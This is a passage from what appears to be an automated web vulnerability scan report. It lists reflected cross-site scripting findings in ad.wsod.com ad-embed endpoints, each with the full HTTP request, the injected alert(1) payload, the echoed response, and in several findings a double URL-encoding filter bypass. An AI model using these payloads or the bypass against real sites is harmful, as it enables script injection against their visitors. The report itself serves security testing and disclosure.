Date: Wed, 23 Mar 2011 19:42:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589afdd3"><script>alert(1)</script>184dd8f0960&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd98f"-alert(1)-"77c5ebbd757 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=clickdd98f"-alert(1)-"77c5ebbd757&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
pt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909285**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=clickdd98f"-alert(1)-"77c5ebbd757&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,4
...[SNIP]...

1.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11d26"><script>alert(1)</script>bb744f5e263 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click11d26"><script>alert(1)</script>bb744f5e263&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click11d26"><script>alert(1)</script>bb744f5e263&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,4
...[SNIP]...

1.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b8d"><script>alert(1)</script>94ff8a219f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&59b8d"><script>alert(1)</script>94ff8a219f7=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2721

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
7251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&59b8d"><script>alert(1)</script>94ff8a219f7=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5d53"-alert(1)-"6b4d3c78d35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&f5d53"-alert(1)-"6b4d3c78d35=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2691

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
7251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&f5d53"-alert(1)-"6b4d3c78d35=1">
...[SNIP]...

1.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c61%2522%253balert%25281%2529%252f%252f94085d9ef0d was submitted in the REST URL parameter 2. This input was echoed as a6c61";alert(1)//94085d9ef0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357a6c61%2522%253balert%25281%2529%252f%252f94085d9ef0d/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2496

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357a6c61";alert(1)//94085d9ef0d/475.0.iframe.200x33/1300828294**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=130083
...[SNIP]...

1.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1b834ed8a3 was submitted in the REST URL parameter 2. This input was echoed as 98bf0"><script>alert(1)</script>c1b834ed8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135798bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1b834ed8a3/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2541

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135798bf0"><script>alert(1)</script>c1b834ed8a3/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d6e%2522%253balert%25281%2529%252f%252f327e1fc8239 was submitted in the REST URL parameter 3. This input was echoed as 54d6e";alert(1)//327e1fc8239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3354d6e%2522%253balert%25281%2529%252f%252f327e1fc8239/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2496

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3354d6e";alert(1)//327e1fc8239/1300828295**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqh
...[SNIP]...

1.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e041566a1ce1 was submitted in the REST URL parameter 3. This input was echoed as 43a10"><script>alert(1)</script>041566a1ce1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3343a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e041566a1ce1/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2541

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3343a10"><script>alert(1)</script>041566a1ce1/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35630"-alert(1)-"a23e707c4c2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*35630"-alert(1)-"a23e707c4c2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2468

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*35630"-alert(1)-"a23e707c4c2">
...[SNIP]...

1.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27167"><script>alert(1)</script>e45a8d5565a was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*27167"><script>alert(1)</script>e45a8d5565a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
